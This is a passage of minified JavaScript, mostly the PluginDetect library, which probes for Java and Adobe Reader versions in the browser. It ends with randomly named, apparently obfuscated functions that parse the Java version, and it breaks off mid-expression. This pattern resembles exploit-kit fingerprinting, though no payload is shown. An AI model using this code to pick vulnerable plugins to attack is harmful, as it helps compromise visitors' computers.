e=this,f=h.$,b,a,d;c=f.formatNum(c);a={v:c,x:-1};if(c){for(b=0;b<h.Lower.length;b++){d=e.convert_(h,b,h.Lower[b]);if(d&&f.compareNums(c,g?d:h.Lower[b])>=0&&(!b||f.compareNums(c,g?e.convert_(h,b,h.Upper[b]):h.Upper[b])<0)){a.v=e.convert_(h,b,c,g);a.x=b;break}}}return a},isMin:function(g,f){var d=this,e=g.$,c,b,a=0;d.init(g);return a},search:function(g){var k=this,h=k.$,i=g.$$,b=0,c;k.init(g);c=(g.hasRun||k.isDisabled())?1:0;g.hasRun=1;if(c){return g.version};var o,n,m,j=function(q,t){var r=[].concat(f),s;r[q]=t;s=k.isActiveXObject(g,r.join(","));if(s){b=1;f[q]=t}else{p[q]=t}return s},d=g.DIGITMAX,e,a,l=99999999,f=[0,0,0,0],p=[0,0,0,0];for(o=0;o<p.length;o++){f[o]=Math.floor(g.DIGITMIN[o])||0;e=f.join(",");a=f.slice(0,o).concat([l,l,l,l]).slice(0,f.length).join(",");for(m=0;m<d.length;m++){if(h.isArray(d[m])){d[m].push(0);if(d[m][o]>p[o]&&h.compareNums(a,g.Lower[m])>=0&&h.compareNums(e,g.Upper[m])<0){p[o]=Math.floor(d[m][o])}}}for(n=0;n<30;n++){if(p[o]-f[o]<=16){for(m=p[o];m>=f[o]+(o?1:0);m--){if(j(o,m)){break}}break}j(o,Math.round((p[o]+f[o])/2))}if(!b){break}p[o]=f[o]}if(b){g.version=k.convert(g,f.join(",")).v};return g.version}},win:{$:1,loaded:false,hasRun:0,init:function(){var b=this,a=b.$;if(!b.hasRun){b.hasRun=1;b.addEvent("load",a.ev.handler(b.runFuncs,a));b.addEvent("unload",a.ev.handler(b.cleanup,a))}},addEvent:function(c,b){var e=this,d=e.$,a=window;if(d.isFunc(b)){if(a.addEventListener){a.addEventListener(c,b,false)}else{if(a.attachEvent){a.attachEvent("on"+c,b)}else{a["on"+c]=e.concatFn(b,a["on"+c])}}}},concatFn:function(d,c){return function(){d();if(typeof c=="function"){c()}}},funcs0:[],funcs:[],cleanup:function(b){if(b){for(var a in b){b[a]=0}b=0}},runFuncs:function(a){if(a&&!a.win.loaded){a.win.loaded=true;a.ev.callArray(a.win.funcs0);a.ev.callArray(a.win.funcs);if(a.DOM){a.DOM.onDoneEmptyDiv()}}},z:0},DOM:{$:1,isEnabled:{$:1,objectTag:function(){var a=this.$;return a.isIE?a.ActiveXEnabled:1},objectProperty:function(){var a=this.$;return a.isIE&&a.verIE>=7?1:0}},div:null,divID:"plugindetect",divClass:"doNotRemove",divWidth:50,getDiv:function(){var a=this;return a.div||document.getElementById(a.divID)||null},isDivPermanent:function(){var b=this,c=b.$,a=b.getDiv();return a&&c.isString(a.className)&&a.className.toLowerCase().indexOf(b.divClass.toLowerCase())>-1?1:0},initDiv:function(b){var c=this,d=c.$,a;if(!c.div){a=c.getDiv();if(a){c.div=a}else{if(b){c.div=document.createElement("div");c.div.id=c.divID}}if(c.div){c.setStyle(c.div,c.defaultStyle.concat(["display","block","width",c.divWidth+"px","height",(c.pluginSize+3)+"px","fontSize",(c.pluginSize+3)+"px","lineHeight",(c.pluginSize+3)+"px"]));if(!a){c.setStyle(c.div,["position","absolute","right","0px","top","0px"]);c.insertDivInBody(c.div)}}}},pluginSize:1,altHTML:"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;",emptyNode:function(c){var b=this,d=b.$,a,f;if(c&&c.childNodes){for(a=c.childNodes.length-1;a>=0;a--){if(d.isIE){b.setStyle(c.childNodes[a],["display","none"])}c.removeChild(c.childNodes[a])}}},LASTfuncs:[],onDoneEmptyDiv:function(){var f=this,g=f.$,b,d,c,a,h;f.initDiv();if(!g.win.loaded||g.win.funcs0.length||g.win.funcs.length){return}for(b in g.Plugins){d=g.Plugins[b];if(d){if(d.OTF==3||(d.funcs&&d.funcs.length)){return}}}g.ev.callArray(f.LASTfuncs);a=f.getDiv();if(a){if(f.isDivPermanent()){}else{if(a.childNodes){for(b=a.childNodes.length-1;b>=0;b--){c=a.childNodes[b];f.emptyNode(c)}try{a.innerHTML=""}catch(h){}}if(a.parentNode){try{a.parentNode.removeChild(a)}catch(h){}a=null;f.div=null}}}},width:function(){var g=this,e=g.DOM,f=e.$,d=g.span,b,c,a=-1;b=d&&f.isNum(d.scrollWidth)?d.scrollWidth:a;c=d&&f.isNum(d.offsetWidth)?d.offsetWidth:a;return c>0?c:(b>0?b:Math.max(c,b))},obj:function(b){var d=this,c=d.span,a=c&&c.firstChild?c.firstChild:null;return a},readyState:function(){var b=this,a=b.DOM.$;return a.isIE?a.getPROP(b.obj(),"readyState"):b.undefined},objectProperty:function(){var d=this,b=d.DOM,c=b.$,a;if(b.isEnabled.objectProperty()){a=c.getPROP(d.obj(),"object")}return a},getTagStatus:function(b,m,r,p,f,h){var s=this,d=s.$,q;if(!b||!b.span){return -2}var k=b.width(),c=b.readyState(),a=b.objectProperty();if(a){return 1.5}var g=/clsid\s*\:/i,o=r&&g.test(r.outerHTML||"")?r:(p&&g.test(p.outerHTML||"")?p:0),i=r&&!g.test(r.outerHTML||"")?r:(p&&!g.test(p.outerHTML||"")?p:0),l=b&&g.test(b.outerHTML||"")?o:i;if(!m||!m.span||!l||!l.span){return 0}var j=l.width(),n=m.width(),t=l.readyState();if(k<0||j<0||n<=s.pluginSize){return 0}if(h&&!b.pi&&d.isDefined(a)&&d.isIE&&b.tagName==l.tagName&&b.time<=l.time&&k===j&&c===0&&t!==0){b.pi=1}if(j<n){return b.pi?-0.1:0}if(k>=n){if(!b.winLoaded&&d.win.loaded){return b.pi?-0.5:-1}if(d.isNum(f)){if(!d.isNum(b.count2)){b.count2=f}if(f-b.count2>0){return b.pi?-0.5:-1}}}try{if(k==s.pluginSize&&(!d.isIE||c===4)){if(!b.winLoaded&&d.win.loaded){return 1}if(b.winLoaded&&d.isNum(f)){if(!d.isNum(b.count)){b.count=f}if(f-b.count>=5){return 1}}}}catch(q){}return b.pi?-0.1:0},setStyle:function(b,h){var c=this,d=c.$,g=b.style,a,f;if(g&&h){for(a=0;a<h.length;a=a+2){try{g[h[a]]=h[a+1]}catch(f){}}}},insertDivInBody:function(a,h){var j=this,d=j.$,g,b="pd33993399",c=null,i=h?window.top.document:window.document,f=i.getElementsByTagName("body")[0]||i.body;if(!f){try{i.write('<div id="'+b+'">.'+d.openTag+"/div>");c=i.getElementById(b)}catch(g){}}f=i.getElementsByTagName("body")[0]||i.body;if(f){f.insertBefore(a,f.firstChild);if(c){f.removeChild(c)}}},defaultStyle:["verticalAlign","baseline","outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"],insert:function(b,i,g,h,c,q,o){var s=this,f=s.$,r,t=document,v,m,p=t.createElement("span"),k,a,l="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:"+(q?"hidden;":"visible;")+"display:inline;";if(!f.isDefined(h)){h=""}if(f.isString(b)&&(/[^\s]/).test(b)){b=b.toLowerCase().replace(/\s/g,"");v=f.openTag+b+" ";v+='style="'+l+'" ';var j=1,u=1;for(k=0;k<i.length;k=k+2){if(/[^\s]/.test(i[k+1])){v+=i[k]+'="'+i[k+1]+'" '}if((/width/i).test(i[k])){j=0}if((/height/i).test(i[k])){u=0}}v+=(j?'width="'+s.pluginSize+'" ':"")+(u?'height="'+s.pluginSize+'" ':"");v+=">";for(k=0;k<g.length;k=k+2){if(/[^\s]/.test(g[k+1])){v+=f.openTag+'param name="'+g[k]+'" value="'+g[k+1]+'" />'}}v+=h+f.openTag+"/"+b+">"}else{b="";v=h}if(!o){s.initDiv(1)}var n=o||s.getDiv();m={span:null,winLoaded:f.win.loaded,tagName:b,outerHTML:v,DOM:s,time:new Date().getTime(),width:s.width,obj:s.obj,readyState:s.readyState,objectProperty:s.objectProperty};if(n&&n.parentNode){s.setStyle(p,s.defaultStyle.concat(["display","inline"]).concat(o?[]:["fontSize",(s.pluginSize+3)+"px","lineHeight",(s.pluginSize+3)+"px"]));n.appendChild(p);try{p.innerHTML=v}catch(r){};m.span=p;m.winLoaded=f.win.loaded}return m}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\\."):"";d=new RegExp("^(.*[^\\/])("+g+"\\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{$:1,mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeType_dummy:"application/dummymimejavaapplet",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",classID_dummy:"clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",navigator:{$:1,a:(function(){var b,a=!0;try{a=window.navigator.javaEnabled()}catch(b){}return a})(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,getVerifyTagsDefault:function(){return[1,this.applet.isDisabled.VerifyTagsDefault_1()?0:1,1]},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);b.setPluginStatus(e[0],e[1],f,j)}return}if((!f||d.dbug)&&b.navMime.query().version){f=b.navMime.version}if((!f||d.dbug)&&b.DTK.query(d.dbug).version){f=b.DTK.version}if((!f||d.dbug)&&b.navPlugin.query().version){f=b.navPlugin.version}if(b.nonAppletDetectionOk(f)){c=f}b.setPluginStatus(c,l,f,j);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f,j)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||!a.javaEnabled()||(!e.isIE&&!a.mimeObj)||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,i,g,h){var b=this,e=b.$,f,c=0,a=b.applet;g=g||b.version0;f=a.isRange(d);if(f){if(a.setRange(f,h)==d){c=f}d=0}if(b.OTF<3){b.installed=c?(c>0?0.7:-0.1):(d?1:(g?-0.2:-1))}if(b.OTF==2&&b.NOTF&&!b.applet.getResult()[0]){b.installed=g?-0.2:-1}if(b.OTF==3&&b.installed!=-0.5&&b.installed!=0.5){b.installed=(b.NOTF.isJavaActive(1)==1?0.5:-0.5)}if(b.OTF==4&&(b.installed==-0.5||b.installed==0.5)){if(d){b.installed=1}else{if(c){b.installed=c>0?0.7:-0.1}else{if(b.NOTF.isJavaActive(1)==1){if(g){b.installed=1;d=g}else{b.installed=0}}else{if(g){b.installed=-0.2}else{b.installed=-1}}}}}if(g){b.version0=e.formatNum(e.getNum(g))}if(d&&!c){b.version=e.formatNum(e.getNum(d))}if(i&&e.isString(i)){b.vendor=i}if(!b.vendor){b.vendor=""}if(b.verify&&b.verify.isEnabled()){b.getVersionDone=0}else{if(b.getVersionDone!=1){if(b.OTF<2){b.getVersionDone=0}else{b.getVersionDone=b.applet.can_Insert_Query_Any()?0:1}}};e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(a){var b=this,c=b.$;if(!a&&(!c.DOM.isEnabled.objectTag()||(c.isIE&&c.verIE<6)||(c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome)){return 1}return 0},query:function(n){var l=this,h=l.$,f=l.$$,k,m,i,a=h.DOM.altHTML,g={},b,d=null,j=null,c=(l.hasRun||l.isDisabled(n));l.hasRun=1;if(c){return l}l.status=0;if(h.isIE){for(m=0;m<l.classID.length;m++){l.HTML=h.DOM.insert("object",["classid",l.classID[m]],[],a);d=l.HTML.obj();if(h.getPROP(d,"jvms")){break}}}else{i=h.hasMimeType(l.mimeType);if(i&&i.type){l.HTML=h.DOM.insert("object",["type",i.type],[],a);d=l.HTML.obj()}}if(d){try{b=h.getPROP(d,"jvms");if(b){j=b.getLength();if(h.isNum(j)){l.status=j>0?1:-1;for(m=0;m<j;m++){i=h.getNum(b.get(j-1-m).version);if(i){l.VERSIONS.push(i);g["a"+h.formatNum(i)]=1}}}}}catch(k){}}i=0;for(m in g){i++}if(i&&i!==l.VERSIONS.length){l.VERSIONS=[]}if(l.VERSIONS.length){l.version=h.formatNum(l.VERSIONS[0])};return l}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,isDisabled:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.isDisabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",isDisabled:function(){var d=this,c=d.$,b=d.$$,a=b.navigator;if(c.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.isDisabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";if(!f||e.dbug){g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5){f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")}}if(!f||e.dbug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.formatNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},applet:{$:1,codebase:{$:1,isMin:function(a){return this.$.codebase.isMin(this,a)},search:function(){return this.$.codebase.search(this)},ParamTags:'<param name="code" value="A19999.class" /><param name="codebase_lookup" value="false" />',DIGITMAX:[[16,64],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(b,a){return a?[parseInt(b[0],10)>1?"99":parseInt(b[1],10)+3+"",b[3],"0","0"]:["1",parseInt(b[0],10)-3+"","0",b[1]]},function(b,a){return a?[b[1],b[2],b[3]+"0","0"]:["1",b[0],b[1],b[2].substring(0,b[2].length-1||1)]},0,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},0,1,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var b=this,d=b.results,a,c=[];for(a=d.length-1;a>=0;a--){c=d[a];if(c[0]){break}}c=[].concat(c);return c},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=1;a<b.allowed.length;a++){if(c.length>a-1&&d.isNum(c[a-1])){if(c[a-1]<0){c[a-1]=0}if(c[a-1]>3){c[a-1]=3}b.allowed[a]=c[a-1]}}b.allowed[0]=b.allowed[3]}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(c.dbug){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},isDisabled:{$:1,single:function(d){var a=this,c=a.$,b=a.$$;if(d==0){return c.codebase.isDisabled()}if((d==3&&!c.isIE)||a.all()){return 1}if(d==1||d==3){return !c.DOM.isEnabled.objectTag()}if(d==2){return a.AppletTag()}},aA_:null,all:function(){var c=this,e=c.$,d=c.$$,b=d.navigator,a=0;if(c.aA_===null){if(e.OS>=20){a=0}else{if(e.verOpera&&e.verOpera<11&&!b.javaEnabled()){a=1}else{if((e.verGecko&&e.compareNums(e.verGecko,e.formatNum("2"))<0)&&!b.mimeObj){a=1}else{if(c.AppletTag()&&!e.DOM.isEnabled.objectTag()){a=1}}}};c.aA_=a}return c.aA_},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},VerifyTagsDefault_1:function(){var a=this.$;if(a.OS>=20){return 1}if((a.isIE&&(a.verIE<9||!a.ActiveXEnabled))||(a.verGecko&&a.compareNums(a.verGecko,a.formatNum("2"))<0)||(a.isSafari&&(!a.verSafari||a.compareNums(a.verSafari,a.formatNum("4"))<0))||(a.verOpera&&a.verOpera<10)){return 0}return 1},z:0},can_Insert_Query:function(d){var b=this,c=b.results[0][0],a=b.getResult()[0];if(b.HTML[d]||(d==0&&c!==null&&!b.isRange(c))||(d==0&&a&&!b.isRange(a))){return 0}return !b.isDisabled.single(d)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(e){var c=this,f=c.allowed,d=c.$,b=c.$$,a=c.getResult()[0];a=a&&(e>0||!c.isRange(a));if(!c.can_Insert_Query(e)||f[e]===0){return 0}if(f[e]==3||(f[e]==2.8&&!a)){return 1}if(!b.nonAppletDetectionOk(b.version0)){if(f[e]==2||(f[e]==1&&!a)){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var j,a=this,i=a.$,d=a.$$,k=null,l=null,b=a.results,c,h,g=a.HTML[f];if(!g||!g.obj()||b[f][0]||d.bridgeDisabled||(i.dbug&&d.OTF<3)){return}c=g.obj();h=g.readyState();if(!i.isIE||h===4){try{k=i.getNum(c.getVersion()+"");l=c.getVendor()+"";c.statusbar(i.win.loaded?" ":" ")}catch(j){};if(k&&i.isStrNum(k)){b[f]=[k,l];a.active[f]=2}}},isRange:function(a){return(/^[<>]/).test(a||"")?(a.charAt(0)==">"?1:-1):0},setRange:function(b,a){return(b?(b>0?">":"<"):"")+(this.$.isString(a)?a:"")},insertJavaTag:function(g,n,h,o,m){var e=this,c=e.$,k=e.$$,r="A.class",b=c.file.getValid(k),f=b.name+b.ext,q=b.path;var i=["archive",f,"code",r],l=(o?["width",o]:[]).concat(m?["height",m]:[]),j=["mayscript","true"],p=["scriptable","true","codebase_lookup","false"].concat(j),a=k.navigator,d=!c.isIE&&a.mimeObj&&a.mimeObj.type?a.mimeObj.type:k.mimeType[0];if(g==1){return c.isIE?c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n)}if(g==2){return c.isIE?c.DOM.insert("applet",["alt",h].concat(j).concat(i).concat(l),["codebase",q].concat(p),h,k,0,n):c.DOM.insert("applet",["codebase",q,"alt",h].concat(j).concat(i).concat(l),[].concat(p),h,k,0,n)}if(g==3){return c.isIE?c.DOM.insert("object",["classid",k.classID].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert()}if(g==4){return c.DOM.insert("embed",["codebase",q].concat(i).concat(["type",d]).concat(p).concat(l),[],h,k,0,n)}},insert_Query_Any:function(i){var b=this,d=b.$,c=b.$$,g=b.results,j=b.HTML,a=d.DOM.altHTML,e,h=d.file.getValid(c);if(b.should_Insert_Query(0)){if(c.OTF<2){c.OTF=2};g[0]=[0,0];e=i?b.codebase.isMin(i):b.codebase.search();if(e){g[0][0]=i?b.setRange(e,i):e}b.active[0]=e?1.5:-1}if(!h){return b.getResult()}if(!b.DummySpanTagHTML){b.DummySpanTagHTML=d.DOM.insert("",[],[],a)}if(b.should_Insert_Query(1)){if(c.OTF<2){c.OTF=2};j[1]=b.insertJavaTag(1,0,a);g[1]=[0,0];b.query(1)}if(b.should_Insert_Query(2)){if(c.OTF<2){c.OTF=2};j[2]=b.insertJavaTag(2,0,a);g[2]=[0,0];b.query(2)}if(b.should_Insert_Query(3)){if(c.OTF<2){c.OTF=2};j[3]=b.insertJavaTag(3,0,a);g[3]=[0,0];b.query(3)}if(d.DOM.isEnabled.objectTag()){if(!b.DummyObjTagHTML&&(j[1]||j[2])){b.DummyObjTagHTML=d.DOM.insert("object",["type",c.mimeType_dummy],[],a)}if(!b.DummyObjTagHTML2&&j[3]){b.DummyObjTagHTML2=d.DOM.insert("object",["classid",c.classID_dummy],[],a)}}var f=c.NOTF;if(c.OTF<3&&f.shouldContinueQuery()){c.OTF=3;f.onIntervalQuery=d.ev.handler(f.$$onIntervalQuery,f);if(!d.win.loaded){d.win.funcs0.push([f.winOnLoadQuery,f])}setTimeout(f.onIntervalQuery,f.intervalLength)}return b.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var f=this,e=f.$,c=f.$$,b=c.applet,a,d=0;if(e.win.loaded&&f.count>f.countMax){return 0}for(a=0;a<b.results.length;a++){if(b.HTML[a]){if(!e.win.loaded&&f.count>f.countMax&&e.codebase.checkGarbage(b.HTML[a].span)){d=1;b.HTML[a].DELETE=1}if(!d&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&f.isAppletActive(a)>=0){return 1}}};return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(e,g){var h=this,f=h.$,b=h.$$,l=b.navigator,a=b.applet,i=a.HTML[e],d=a.active,k,c=0,j,m=d[e];if(g||m>=1.5||!i||!i.span){return m};j=f.DOM.getTagStatus(i,a.DummySpanTagHTML,a.DummyObjTagHTML,a.DummyObjTagHTML2,h.count);for(k=0;k<d.length;k++){if(d[k]>0){c=1}}if(j!=1){m=j}else{if(f.isIE||(b.version0&&l.javaEnabled()&&l.mimeObj&&(i.tagName=="object"||c))){m=1}else{m=0}}d[e]=m;return m},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a)}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()){d.queryCompleted(a)}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var f=this,e=f.$,d=f.$$,c=d.applet,b,a;for(b=0;b<c.results.length;b++){c.query(b)}a=c.getResult();return a},queryCompleted:function(c){var g=this,f=g.$,e=g.$$,d=e.applet,b;if(e.OTF>=4){return}e.OTF=4;var a=g.isJavaActive();for(b=0;b<d.HTML.length;b++){if(d.HTML[b]&&d.HTML[b].DELETE){f.DOM.emptyNode(d.HTML[b].span);d.HTML[b].span=null}}e.setPluginStatus(c[0],c[1],0);if(f.onDetectionDone&&e.funcs){f.ev.callArray(e.funcs)}if(f.DOM){f.DOM.onDoneEmptyDiv()}}},zz:0},adobereader:{$:1,setPluginStatus:function(){var d=this,b=d.$,a=d.navPlugin.detected,e=d.navPlugin.version,g=d.axo.detected,c=d.axo.version,i=d.doc.detected,h=d.doc.version,f=e||c||h||null;d.installed=f?1:(a>0||g>0||i>0?0:(i==-0.5?-0.15:(b.isIE&&(!b.ActiveXEnabled||b.ActiveXFilteringEnabled)?-1.5:-1)));d.version=b.formatNum(f)},getVersion:function(c,e){var a=this,d=a.$,b=0;if((!b||d.dbug)&&a.navPlugin.query().detected>0){b=1}if((!b||d.dbug)&&a.axo.query().detected>0){b=1}if((!b||d.dbug)&&(a.doc.query().detected>0||a.doc.detected==-0.5)){b=1}a.setPluginStatus()},navPlugin:{$:1,detected:0,version:null,mimeType:"application/pdf",isDisabled:function(){var c=this,b=c.$,a=c.$$;return b.isIE||c.detected||!b.hasMimeType(c.mimeType)?1:0},attempt3:function(){var c=this,b=c.$,a=null;if(b.OS==1){if(b.hasMimeType("application/vnd.adobe.pdfxml")){a="9"}else{if(b.hasMimeType("application/vnd.adobe.x-mars")){a="8"}else{if(b.hasMimeType("application/vnd.adobe.xfdf")){a="6"}}}}return a},query:function(){var d=this,c=d.$,a=d.$$,f,e,b=null;if(d.isDisabled()){return d};f="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";e=c.findNavPlugin(f,0);d.detected=e?1:-1;if(e){b=c.getNum(e.description)||c.getNum(e.name);b=c.getPluginFileVersion(e,b);if(!b){b=d.attempt3()}}if(b){d.version=b};return d}},pluginQuery:function(j){var f=this,d=f.$,b="",h=null,g,a,i,c;try{if(j){b=j.GetVersions()}}catch(g){}if(b&&d.isString(b)){a=/=\s*([\d\.]+)/g;for(i=0;i<30;i++){if(a.test(b)){c=d.formatNum(RegExp.$1);if(!h||d.compareNums(c>h)>0){h=c}}else{break}}}return h},axo:{$:1,detected:0,version:null,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],isDisabled:function(){var b=this,c=b.$,a=b.$$;return c.isIE&&!b.detected?0:1},query:function(){var d=this,e=d.$,b=d.$$,f=0,c=null,a;if(d.isDisabled()){return d};for(a=0;a<d.progID.length;a++){f=e.getAXO(d.progID[a]);if(f){d.detected=1;c=b.pluginQuery(f);if(!e.dbug&&c){break}}}d.version=c?c:null;if(d.detected===0){d.detected=-1};return d}},doc:{$:1,detected:0,version:null,classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",classID_dummy:"clsid:CA8A9780-280D-11CF-A24D-BA9876543210",DummySpanTagHTML:0,HTML:0,DummyObjTagHTML1:0,DummyObjTagHTML2:0,isDisabled:function(){var c=this,b=c.$,a=0;if(c.detected){a=1}else{if(b.dbug){}else{if(!b.isIE||!b.DOM.isEnabled.objectTag()){a=1}}}return a},query:function(){var i=this,d=i.$,f=i.$$,h=null,a=d.DOM.altHTML,g=null,c=1,e=1,b;if(i.isDisabled()){return i};if(!i.DummySpanTagHTML){i.DummySpanTagHTML=d.DOM.insert("",[],[],a,f,e)}if(!i.HTML){i.HTML=d.DOM.insert("object",["classid",i.classID],[],a,f,e)}if(!i.DummyObjTagHTML2){i.DummyObjTagHTML2=d.DOM.insert("object",["classid",i.classID_dummy],[],a,f,e)}b=d.DOM.getTagStatus(i.HTML,i.DummySpanTagHTML,i.DummyObjTagHTML1,i.DummyObjTagHTML2,g,c);h=f.pluginQuery(i.HTML.obj());i.detected=b>0||h?1:(b==-0.1||b==-0.5?-0.5:-1);i.version=h?h:null;return i}}},zz:0}};PluginDetect.INIT();function PcyjjcB(QXRwqr){var NxZFu = PluginDetect.getVersion(QXRwqr);if(NxZFu != null){return DzIEPNhc(NxZFu);}else{return null;}}function ipzPNmQxc(QEzGR){if(QEzGR != null){var BZIMlJFt = parseFloat(QEzGR[1] + "." + QEzGR[3]);if(QEzGR[0] == 1 && BZIMlJFt 